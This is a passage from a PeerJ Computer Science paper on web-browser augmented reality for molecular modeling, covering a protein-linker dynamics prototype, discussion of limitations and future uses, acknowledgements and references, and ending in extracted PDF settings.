(Figs. 5A–5C). Each folded domain (ubiquitin and ubiquitin-interacting motif, taken from PDB ID 2D3G) is modeled at a resolution of two spheres per residue, one centered at the backbone’s alpha carbon and one at the center of mass of the sidechain (i.e., a description slightly coarser than that of the MARTINI force field (Marrink et al., 2007)). All spheres representing residues of the folded domains are kept in fixed positions relative to their AR marker, and have radii assigned as the cubic root of the amino acid volumes to roughly respect the relative amino acid sizes (Abriata, Palzkill & Dal Peraro, 2015). The glycine residues of the flexible linker are modeled as single spheres centered at the alpha carbons with their radii set to the cubic root of glycine’s volume. Using Cannon.js, the spheres representing the glycine residues of the flexible linker (in orange in Fig. 5) are allowed to move freely but under a fixed-distance constraint from each other and from the corresponding ends of the folded domains. This very simple model can help to answer questions related to the separation of the anchor points and the maximal extension of the linker when straight: How far apart can the two proteins go with the given linker containing six residues? Can both proteins be docked through certain interfaces keeping the linker in a relaxed configuration? The user’s investigations are assisted by on-the-fly estimation of entropy associated to given extensions of the linkers, estimated with a worm-like chain model from polymer physics (Marko & Siggia, 1995), and by an estimation of the strain experienced by the linker when the user pulls its glycine residues apart beyond their equilibrium distance. DISCUSSION Achieving seamless integration of immersive visualizations, haptic interfaces and chemical computation stands as one of the key “grand challenges” for the simulation of matter in the 21st century (Aspuru-Guzik, Lindh & Reiher, 2018). Such integration is expected to help us to more easily grasp and explore molecular properties and to efficiently navigate chemical information. In the last two decades several works introduced different ways to achieve AR and VR, as presented in the Introduction section. In education, such tools could replace or complement physical (such as plastic-made) modeling kits, augmenting them with additional information about forces, charges, electron distributions, data facts, etc. In research, such tools could help better visualize and probe molecular structure, simulate expected outcomes of experiments and test models and simulated data against experimental data, etc., all through intuitive cues and fluent human-computer interactions. This article introduced a minimal set of building blocks and code for developing marker-based AR applications for molecular modeling in web browsers using regular computers. Since web AR is a new and emerging technology, it is reasonable to identify some limitations. Naturally, such web apps cannot currently match the graphics quality and interfacing capabilities of programs prepared for specialized AR/VR hardware, and the Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 15/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Figure 5 Dynamics of highly disordered protein linkers modeled with rigid-body mechanics. Ubiquitin and ubiquitin-interacting motif (PDB ID 2D3G) modeled as two to four beads per residue, colored by physi- cochemical properties (gray = hydrophobic, red = negative, blue = positive, green = polar uncharged; backbone beads in black). The domains are driven independently in 3D with two AR markers. They are connected through a flexible linker of six backbone-sized beads (orange) whose dynamics are treated with the Cannon.js rigid-body force field. The web app reports in real time the distance between the centers of both domains, the entropy of the linker based on a worm-like chain model, and the linker strain computed from deviations of distances between consecutive linker beads from an equilibrium distance. (A) The two domains extended as much as possible while keeping the linker relaxed (although entropically unfavored) illustrates the maximum possible separation with the given linker is of around 40 Å. (B) The binding pose between the two domains is geometrically feasible as it keeps the linker relaxed. (C) This other binding pose is unachievable with a linker of this length. Full-size DOI: 10.7717/peerj-cs.260/fig-5 Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 16/23 http://dx.doi.org/10.7717/peerj-cs.260/fig-5 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ use of a webcam to follow markers can result in unstable tracking under certain conditions compared to setups that use ad hoc devices. Another limitation is that support for AR in smartphones is not uniform, and varies greatly between devices. Currently, only laptops and desktop computers provide a consistent experience. Lastly, content developers must routinely verify that the web apps continue to work in major browsers after updates, and also validate them against new W3C standards, APIs and libraries. On the bright side, these web apps have some important advantages. First, all examples presented here rely only on client-side programming; therefore, applications need only be uploaded to regular webservers to become available to the world. Second, they do not require client-side plugins, so are supported “out of the box” by standard web browsers. Third, the modularity of JavaScript and the availability of several ready-to-use libraries greatly simplify development of new content. Fourth, users of these applications do not need to worry about updates, as they always receive the latest version when they reload the page. All in all, these positive features will favor adoption of browser based AR/VR for educational purposes over alternatives that require specialized software and hardware. Future perspectives For educational applications, the next stage would be to develop actual content of value for teachers and students. The simplest content could merely provide visualizations to explore molecular geometries, surfaces, orbitals, etc., with specific sets of demos to assist learning of key concepts such as chirality, organic molecules, metal coordination complexes and biomacromolecular structures, to mention just a few cases. By adding mechanics, more complex demos could be created where students could for example interactively explore torsion angles as in the textbook cases of probing the energy landscape of rotation around the central C–C bond of butane, or swapping between chair and boat conformations of six-member rings, exploring hydrogen bonding patterns between neighbor beta strands in a protein, etc. Importantly, every single student having a computer at hand could use these apps, not only at the school/university but also at home, therefore this could become an actual learning tool of full-time, individual use. The possibility of reaching the masses with this kind of web technologies for AR-based molecular modeling in turn opens up the opportunity of performing large-scale evaluations of their actual impact in education. As actively investigated by others, there is also a need to explore if full working programs for AR-based molecular modeling may actually become powerful enough to also assist research. Here again, web-based tools like those discussed in this article could help to carry out such tests at large scales. Some of the prototypes presented here advance possible uses in research, as in the simulation of data from protein–protein docking poses and comparison to the corresponding experimental data in real time. However, some issues should be addressed before creating fully-fledged web programs for research: (i) improving AR marker detection and tracking to stabilize inputs (Gao et al., 2017), (ii) developing some kind of AR marker that is clickable so that users can drag and drop objects in space (hitherto unexplored), (iii) improving graphics, where the possibility of adapting existing web molecular graphics like NGL (Rose & Hildebrand, 2015), 3dmol Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 17/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ (Rego & Koes, 2015), Litemol (Sehnal et al., in press), Mol� (Sehnal et al., 2018), JSmol (Hanson et al., 2013), etc. is particularly enticing, and (iv) developing force fields that correctly handle molecular dynamics and energetics for different tasks, which may imply different levels of granularity for different applications. Another global improvement, also important for pedagogical applications, would be incorporating proper object occlusion, which is still non-trivial and subject of studies in the AR community (Shah, Arshad & Sulaiman, 2012; Gimeno et al., 2018). Some further directions that could be explored in the near future are fluently connecting through an AR experience users in physically distant locations, so that they can collaborate on a research project or teach/learn at a distance. Adapting future standards for commodity AR/VR in smartphones (plugged into cardboard goggles for stereoscopy) is also worth exploring as this would lead to an even more immersive experience than with the mirror-like apps proposed here. However, since smartphones are more limited in power, their use for AR molecular modeling may require coupling to external computer power. Last, pushing the limits towards fully immersive visual analytics for molecular modeling, and especially thinking about solutions useful for research, a few especially enticing additions include support for haptic devices for force feedback, AR without markers (i.e., just by tracking the users’ hands and fingers) and considering occlusion, and as described above, the capability to respond to visual or audio cues by automatically checking databases and mining literature to propose relevant pieces of information. ACKNOWLEDGEMENTS I acknowledge all the members of the communities that develop the client-side web programming tools used here, as well as the very helpful communities who contribute to their improvement, bug detection and correction, documentation, and online help. Special thanks to J. Ethienne (AR.js developer), Nicolò Carpignoli (AR.js maintainer), D. McCurdy (Google), T. Ater (Annyang developer), L. Stemkoski (Adelphi U., USA), A. Herráez (U. Alcalá, Spain) and A. Papoutsaki (Pomona College, USA) for assistance. I also acknowledge numerous researchers from the physics, chemistry and biology communities who have provided ideas, suggestions, examples and support, especially L. Krapp, S. Träger, M. Dal Peraro, F.G. van der Goot and M.E. Zaballa (EPFL, Switzerland), A. Barducci (CBS, France), D. Moreno and G. Frattini (IQUIR-CONICET-UNR, Argentina), and R. Rasia (IBR-CONICET-UNR, Argentina). Finally, I greatly acknowledge the extremely helpful revisions from the Editor and two reviewers. ADDITIONAL INFORMATION AND DECLARATIONS Funding The author received no funding for this work. Competing Interests The author declares that he has no competing interests. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 18/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Author Contributions � Luciano A. Abriata conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: All code is available as a GitHub repo at https://github.com/labriata/prototype-web- apps-for-AR-molecular-modeling/ and also in the links in the article. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.260#supplemental-information. REFERENCES Abriata LA. 2017a. Web apps come of age for molecular sciences. Informatics 4(3):28 DOI 10.3390/informatics4030028. Abriata LA. 2017b. Concurrent interactive visualization and handling of molecular structures over the Internet in web browsers. ArXiv e-prints arXiv:1712.03131. Abriata LA, Palzkill T, Dal Peraro M. 2015. How structural and physicochemical determinants shape sequence constraints in a functional enzyme. PLOS ONE 10(2):e0118684 DOI 10.1371/journal.pone.0118684. Abriata LA, Rodrigues JPGLM, Salathé M, Patiny L. 2017. Augmenting research, education and outreach with client-side web programming. Trends in Biotechnology 36(5):473–476 DOI 10.1016/j.tibtech.2017.11.009. Abriata LA, Tamò GE, Dal Peraro M. 2019. A further leap of improvement in tertiary structure prediction in CASP13 prompts new routes for future assessments. Proteins: Structure, Function, and Bioinformatics 87(12):1100–1112 DOI 10.1002/prot.25787. Abriata LA, Tamo G, Monastyrskyy M, Kryshtafovych A, Dal Peraro M. 2018. Assessment of hard target modeling in CASP12 reveals an emerging role of alignment-based contact prediction methods. Proteins: Structure, Function, and Bioinformatics 1(Suppl 1):97–112. Aspuru-Guzik A, Lindh R, Reiher M. 2018. The matter simulation (R)evolution. ACS Central Science 4(2):144–152 DOI 10.1021/acscentsci.7b00550. Ater T. 2019. Annyang. Available at https://github.com/TalAter/annyang. Bach B, Sicat R, Beyer J, Cordeil M, Pfister H. 2018. The hologram in my hand: how effective is interactive exploration of 3D visualizations in immersive tangible augmented reality? IEEE Transactions on Visualization and Computer Graphics 24(1):457–467 DOI 10.1109/TVCG.2017.2745941. Balo AR, Wang M, Ernst OP. 2017. Accessible virtual reality of biomolecular structural models using the Autodesk Molecule Viewer. Nature Methods 14(12):1122–1123 DOI 10.1038/nmeth.4506. Bartók AP, De S, Poelking C, Bernstein N, Kermode JR, Csányi G, Ceriotti M. 2017. Machine learning unifies the modeling of materials and molecules. Science Advances 3(12):e1701816 DOI 10.1126/sciadv.1701816. Berry C, Board J. 2014. A protein in the palm of your hand through augmented reality. Biochemistry and Molecular Biology Education 42(5):446–449 DOI 10.1002/bmb.20805. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 19/23 https://github.com/labriata/prototype-web-apps-for-AR-molecular-modeling/ https://github.com/labriata/prototype-web-apps-for-AR-molecular-modeling/ http://dx.doi.org/10.7717/peerj-cs.260#supplemental-information http://dx.doi.org/10.7717/peerj-cs.260#supplemental-information http://dx.doi.org/10.3390/informatics4030028 http://dx.doi.org/10.1371/journal.pone.0118684 http://dx.doi.org/10.1016/j.tibtech.2017.11.009 http://dx.doi.org/10.1002/prot.25787 http://dx.doi.org/10.1021/acscentsci.7b00550 https://github.com/TalAter/annyang http://dx.doi.org/10.1109/TVCG.2017.2745941 http://dx.doi.org/10.1038/nmeth.4506 http://dx.doi.org/10.1126/sciadv.1701816 http://dx.doi.org/10.1002/bmb.20805 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Bertini I, Turano P, Vila AJ. 1993. Nuclear magnetic resonance of paramagnetic metalloproteins. Chemical Reviews 93(8):2833–2932 DOI 10.1021/cr00024a009. Bolopion A, Cagneau B, Redon S, Régnier S. 2009. Haptic feedback for molecular simulation. In: 2009 IEEE/RSJ International Conference on Intelligent Robots and Systems, October 11–15, 2009, St. Louis. 237–242. Bolopion A, Cagneau B, Redon S, Régnier S. 2010. Comparing position and force control for interactive molecular simulators with haptic feedback. Journal of Molecular Graphics and Modelling 29(2):280–289 DOI 10.1016/j.jmgm.2010.06.003. Debye P. 1915. Zerstreuung von Röntgenstrahlen. Annalen der Physik 351(6):809–823 DOI 10.1002/andp.19153510606. DiPierro M. 2018. The rise of JavaScript. Computing in Science & Engineering 20(1):9–10 DOI 10.1109/MCSE.2018.011111120. Doutreligne S, Cragnolini T, Pasquali S, Derreumaux P, Baaden M. 2014. UnityMol: interactive scientific visualization for integrative biology. In: 2014 IEEE 4th Symposium on Large Data Analysis and Visualization (LDAV), Paris. 109–110. Fjeld M, Voegtli BM. 2002. Augmented chemistry: an interactive educational workbench. In: Proceedings of the International Symposium on Mixed and Augmented Reality, Darmstadt. 259–321. Gaffary Y, Le Gouis B, Marchal M, Argelaguet F, Arnaldi B, Lécuyer A. 2017. AR feels “Softer” than VR: haptic perception of stiffness in augmented versus virtual reality. IEEE Transactions on Visualization and Computer Graphics 23(11):2372–2377 DOI 10.1109/TVCG.2017.2735078. Gao QH, Wan TR, Tang W, Chen L. 2017. A stable and accurate marker-less augmented reality registration method. In: 2017 International Conference on Cyberworlds (CW), Chester. 41–47. Gillet A, Sanner M, Stoffler D, Goodsell D, Olson A. 2004. Augmented reality with tangible auto-fabricated models for molecular biology applications. In: IEEE Visualization 2004, Austin, TX, USA. IEEE. Gillet A, Sanner M, Stoffler D, Olson A. 2005. Tangible interfaces for structural molecular biology. Structure 13(3):483–491 DOI 10.1016/j.str.2005.01.009. Gimeno J, Casas S, Portalés C, Fernádez M. 2018. Addressing the occlusion problem in augmented reality environments with phantom hollow objects. In: 2018 IEEE International Symposium on Mixed and Augmented Reality Adjunct (ISMAR-Adjunct), Munich. 21–24. Goddard TD, Brilliant AA, Skillman TL, Vergenz S, Tyrwhitt-Drake J, Meng EC, Ferrin TE. 2018a. Molecular visualization on the Holodeck. Journal of Molecular Biology 430(21):3982–3996 DOI 10.1016/j.jmb.2018.06.040. Goddard TD, Huang CC, Meng EC, Pettersen EF, Couch GS, Morris JH, Ferrin TE. 2018b. UCSF ChimeraX: meeting modern challenges in visualization and analysis. Protein Science 27(1):14–25 DOI 10.1002/pro.3235. Hanson RM, Prilusky J, Renjian Z, Nakane T, Sussman JL. 2013. JSmol and the next-generation web-based representation of 3D molecular structure as applied to proteopedia. Israel Journal of Chemistry 53(3–4):207–216 DOI 10.1002/ijch.201300024. Hendler J. 2003. COMMUNICATION: enhanced: science and the semantic web. Science 299(5606):520–521 DOI 10.1126/science.1078874. Hirano S, Kawasaki M, Ura H, Kato R, Raiborg C, Stenmark H, Wakatsuki S. 2006. Double-sided ubiquitin binding of Hrs-UIM in endosomal protein sorting. Nature Structural & Molecular Biology 13(3):272–277 DOI 10.1038/nsmb1051. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 20/23 http://dx.doi.org/10.1021/cr00024a009 http://dx.doi.org/10.1016/j.jmgm.2010.06.003 http://dx.doi.org/10.1002/andp.19153510606 http://dx.doi.org/10.1109/MCSE.2018.011111120 http://dx.doi.org/10.1109/TVCG.2017.2735078 http://dx.doi.org/10.1016/j.str.2005.01.009 http://dx.doi.org/10.1016/j.jmb.2018.06.040 http://dx.doi.org/10.1002/pro.3235 http://dx.doi.org/10.1002/ijch.201300024 http://dx.doi.org/10.1126/science.1078874 http://dx.doi.org/10.1038/nsmb1051 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Hirst JD, Glowacki DR, Baaden M. 2014. Molecular simulations and visualization: introduction and overview. Faraday Discussions 169:9–22 DOI 10.1039/C4FD90024C. Humphrey W, Dalke A, Schulten K. 1996. VMD: visual molecular dynamics. Journal of Molecular Graphics 14(1):33–38 DOI 10.1016/0263-7855(96)00018-5. Jiang C, Jin X. 2017. Quick way to port existing C/C++ chemoinformatics toolkits to the web using emscripten. Journal of Chemical Information and Modeling 57(10):2407–2412 DOI 10.1021/acs.jcim.7b00434. Kato H. 1999. ARToolKit. Available at http://www.hitl.washington.edu/artoolkit/. Krichenbauer M, Yamamoto G, Taketom T, Sandor C, Kato H. 2018. Augmented reality versus virtual reality for 3D object manipulation. IEEE Transactions on Visualization and Computer Graphics 24(2):1038–1048 DOI 10.1109/TVCG.2017.2658570. Lee J, Kim J-I, Kang L-W. 2012. A collaborative molecular modeling environment using a virtual tunneling service. Journal of Biomedicine and Biotechnology 2012(10):1–7 DOI 10.1155/2012/546521. Maier P, Klinker G. 2013. Augmented chemical reactions: 3D interaction methods for chemistry. International Journal of Online Engineering (iJOE) 9(S8):80 DOI 10.3991/ijoe.v9iS8.3411. Maier P, Tönnis M, GudrunKlinker D. 2009. Dynamics in tangible chemical reactions. World Academy of Science, Engineering and Technology 57:80–86. Marko JF, Siggia ED. 1995. Statistical mechanics of supercoiled DNA. Physical Review E 52(3):2912–2938 DOI 10.1103/PhysRevE.52.2912. Marrink SJ, Risselada HJ, Yefimov S, Tieleman DP, De Vries AH. 2007. The MARTINI force field: coarse grained model for biomolecular simulations. Journal of Physical Chemistry B 111(27):7812–7824 DOI 10.1021/jp071097f. Martínez-Hung H, García-López CA, Escalona-Arranz JC. 2016. Augmented reality models applied to the chemistry education on the university (article in Spanish). Revista Cubana de Química 29:13–25. Matthews D. 2018. Virtual-reality applications give science a new dimension. Nature 557(7703):127–128 DOI 10.1038/d41586-018-04997-2. Matthews N, Kitao A, Laycock S, Hayward S. 2019. Haptic-assisted interactive molecular docking incorporating receptor flexibility. Journal of Chemical Information and Modeling 59(6):2900–2912 DOI 10.1021/acs.jcim.9b00112. Moore EB, Chamberlain JM, Parson R, Perkins KK. 2014. PhET interactive simulations: transformative tools for teaching chemistry. Journal of Chemical Education 91(8):1191–1197 DOI 10.1021/ed4005084. Müller C, Krone M, Huber M, Biener V, Herr D, Koch S, Reina G, Weiskopf D, Ertl T. 2018. Interactive molecular graphics for augmented reality using HoloLens. Journal of Integrative Bioinformatics 15(2):20180005 DOI 10.1515/jib-2018-0005. O’Connor M, Deeks HM, Dawn E, Metatla O, Roudaut A, Sutton M, Thomas LM, Glowacki BR, Sage R, Tew P, Wonnacott M, Bates P, Mulholland AJ, Glowacki DR. 2018. Sampling molecular conformations and dynamics in a multiuser virtual reality framework. Science Advances 4(6):eaat2731 DOI 10.1126/sciadv.aat2731. O’Donoghue SI, Gavin A-C, Gehlenborg N, Goodsell DS, Hériché J-K, Nielsen CB, North C, Olson AJ, Procter JB, Shattuck DW, Walter T, Wong B. 2010. Visualizing biological data— now and in the future. Nature Methods 7(S3):S2–S4 DOI 10.1038/nmeth.f.301. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 21/23 http://dx.doi.org/10.1039/C4FD90024C http://dx.doi.org/10.1016/0263-7855(96)00018-5 http://dx.doi.org/10.1021/acs.jcim.7b00434 http://www.hitl.washington.edu/artoolkit/ http://dx.doi.org/10.1109/TVCG.2017.2658570 http://dx.doi.org/10.1155/2012/546521 http://dx.doi.org/10.3991/ijoe.v9iS8.3411 http://dx.doi.org/10.1103/PhysRevE.52.2912 http://dx.doi.org/10.1021/jp071097f http://dx.doi.org/10.1038/d41586-018-04997-2 http://dx.doi.org/10.1021/acs.jcim.9b00112 http://dx.doi.org/10.1021/ed4005084 http://dx.doi.org/10.1515/jib-2018-0005 http://dx.doi.org/10.1126/sciadv.aat2731 http://dx.doi.org/10.1038/nmeth.f.301 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Ovchinnikov S, Kamisetty H, Baker D. 2014. Robust and accurate prediction of residue–residue interactions across protein interfaces using evolutionary information. eLife 3:e02030 DOI 10.7554/eLife.02030. Pafilis E, O’Donoghue SI, Jensen LJ, Horn H, Kuhn M, Brown NP, Schneider R. 2009. Reflect: augmented browsing for the life scientist. Nature Biotechnology 27(6):508–510 DOI 10.1038/nbt0609-508. Papoutsaki A, Sangkloy P, Laskey J, Daskalova N, Huang J, Hays J. 2016. WebGazer: scalable webcam eye tracking using user interactions. In: Proceedings of the 25th International Joint Conference on Artificial Intelligence, New York. 3839–3845. Paruzzo FM, Hofstetter A, Musil F, De S, Ceriotti M, Emsley L. 2018. Chemical shifts in molecular solids by machine learning. arXiv preprint arXiv:1805.11541 DOI 10.1038/s41467-018-06972-x. Pence HE, Williams AJ, Belford RE. 2015. New tools and challenges for chemical education: mobile learning, augmented reality, and distributed cognition in the dawn of the social and semantic web. In: García‐Martínez J, Serrano‐Torregrosa E, eds. Chemistry Education. Weinheim: Wiley-VCH Verlag GmbH & Co. KGaA, 693–734. Pimentel V, Nickerson BG. 2012. Communicating and displaying real-time data with WebSocket. IEEE Internet Computing 16(4):45–53 DOI 10.1109/MIC.2012.64. Ratamero EM, Bellini D, Dowson CG, Römer RA. 2018. Touching proteins with virtual bare hands: visualizing protein-drug complexes and their dynamics in self-made virtual reality using gaming hardware. Journal of Computer-Aided Molecular Design 32(6):703–709 DOI 10.1007/s10822-018-0123-0. Rebholz-Schuhmann D, Oellrich A, Hoehndorf R. 2012. Text-mining solutions for biomedical research: enabling integrative biology. Nature Reviews Genetics 13(12):829–839 DOI 10.1038/nrg3337. Rego N, Koes D. 2015. 3Dmol.js: molecular visualization with WebGL. Bioinformatics 31(8):1322–1324 DOI 10.1093/bioinformatics/btu829. Rose AS, Hildebrand PW. 2015. NGL viewer: a web application for molecular visualization. Nucleic Acids Research 43(W1):W576–W579 DOI 10.1093/nar/gkv402. Russel D, Lasker K, Webb B, Velázquez-Muriel J, Tjioe E, Schneidman-Duhovny D, Peterson B, Sali A. 2012. Putting the pieces together: integrative modeling platform software for structure determination of macromolecular assemblies. PLOS Biology 10(1):e1001244 DOI 10.1371/journal.pbio.1001244. Sehnal D, Deshpande M, Svobodová Vařeková R, Mir S, Berka K, Midlik A, Pravda L, Velankar S, Koča J. LiteMol suite: interactive web-based visualization of large-scale macromolecular structure data. Nature Methods (in press). Sehnal D, Rose AS, Koča J, Burley SK, Velankar S. 2018. Mol�: towards a common library and tools for web molecular graphics. In: Proceedings of the Workshop on Molecular Graphics and Visual Analysis of Molecular Data, MolVA ’18, Goslar, Eurographics Association. 29–33. Sekhavat YA, Zarei H. 2016. Enhancing the sense of immersion and quality of experience in mobile games using augmented reality. Journal of Computing and Security 3:53–62. Shah MM, Arshad H, Sulaiman R. 2012. Occlusion in augmented reality. In: 2012 8th International Conference on Information Science and Digital Content Technology (ICIDT2012), Jeju. 372–378. Simkovic F, Ovchinnikov S, Baker D, Rigden DJ. 2017. Applications of contact predictions to structural biology. IUCrJ 4(3):291–300 DOI 10.1107/S2052252517005115. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 22/23 http://dx.doi.org/10.7554/eLife.02030 http://dx.doi.org/10.1038/nbt0609-508 http://dx.doi.org/10.1038/s41467-018-06972-x http://dx.doi.org/10.1109/MIC.2012.64 http://dx.doi.org/10.1007/s10822-018-0123-0 http://dx.doi.org/10.1038/nrg3337 http://dx.doi.org/10.1093/bioinformatics/btu829 http://dx.doi.org/10.1093/nar/gkv402 http://dx.doi.org/10.1371/journal.pbio.1001244 http://dx.doi.org/10.1107/S2052252517005115 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Smith JS, Isayev O, Roitberg AE. 2017. ANI-1: an extensible neural network potential with DFT accuracy at force field computational cost. Chemical Science 8(4):3192–3203 DOI 10.1039/C6SC05720A. Sommer B, Baaden M, Krone M, Woods A. 2018. From virtual reality to immersive analytics in bioinformatics. Journal of Integrative Bioinformatics 15(2):20180043 DOI 10.1515/jib-2018-0043. Stocks MB, Hayward S, Laycock SD. 2009. Interacting with the biomolecular solvent accessible surface via a haptic feedback device. BMC Structural Biology 9(1):69 DOI 10.1186/1472-6807-9-69. Stocks MB, Laycock SD, Hayward S. 2011. Applying forces to elastic network models of large biomolecules using a haptic feedback device. Journal of Computer-Aided Molecular Design 25(3):203–211 DOI 10.1007/s10822-010-9410-0. Stone J. 2019. VMD support for VR and interactive MD. Available at https://www.ks.uiuc.edu/ Research/vmd/allversions/interactive_MD.html. Stovgaard K, Andreetta C, Ferkinghoff-Borg J, Hamelryck T. 2010. Calculation of accurate small angle X-ray scattering curves from coarse-grained protein models. BMC Bioinformatics 11(1):429 DOI 10.1186/1471-2105-11-429. Vega Garzón JC, Magrini ML, Galembeck E. 2017. Using augmented reality to teach and learn biochemistry. Biochemistry and Molecular Biology Education 45(5):417–420 DOI 10.1002/bmb.21063. Wiebrands M, Malajczuk CJ, Woods AJ, Rohl AL, Mancera RL. 2018. Molecular dynamics visualization (MDV): stereoscopic 3D display of biomolecular structure and interactions using the unity game engine. Journal of Integrative Bioinformatics 15(2):20180010 DOI 10.1515/jib-2018-0010. Wollacott AM, Merz KM. 2007. Haptic applications for molecular structure manipulation. Journal of Molecular Graphics and Modelling 25(6):801–805 DOI 10.1016/j.jmgm.2006.07.005. Wolle P, Müller MP, Rauh D. 2018. Augmented reality in scientific publications—taking the visualization of 3D structures to the next level. ACS Chemical Biology 13(3):496–499 DOI 10.1021/acschembio.8b00153. Xu K, Liu N, Xu J, Guo C, Zhao L, Wang H-W, Zhang QC. 2019. VRmol: an integrative cloud-based virtual reality system to explore macromolecular structure. bioRxiv 589366 DOI 10.1101/589366. Yang S, Mei B, Yue X. 2018. Mobile augmented reality assisted chemical education: insights from elements 4D. Journal of Chemical Education 95(6):1060–1062 DOI 10.1021/acs.jchemed.8b00017. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 23/23 http://dx.doi.org/10.1039/C6SC05720A http://dx.doi.org/10.1515/jib-2018-0043 http://dx.doi.org/10.1186/1472-6807-9-69 http://dx.doi.org/10.1007/s10822-010-9410-0 https://www.ks.uiuc.edu/Research/vmd/allversions/interactive_MD.html https://www.ks.uiuc.edu/Research/vmd/allversions/interactive_MD.html http://dx.doi.org/10.1186/1471-2105-11-429 http://dx.doi.org/10.1002/bmb.21063 http://dx.doi.org/10.1515/jib-2018-0010 http://dx.doi.org/10.1016/j.jmgm.2006.07.005 http://dx.doi.org/10.1021/acschembio.8b00153 http://dx.doi.org/10.1101/589366 http://dx.doi.org/10.1021/acs.jchemed.8b00017 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.260 Building blocks for commodity augmented reality-based molecular visualization and modeling in web browsers Introduction Part 1: overview of building blocks for immersive molecular modeling in web browsers Part 2: prototype web apps showcasing example applications Discussion flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS 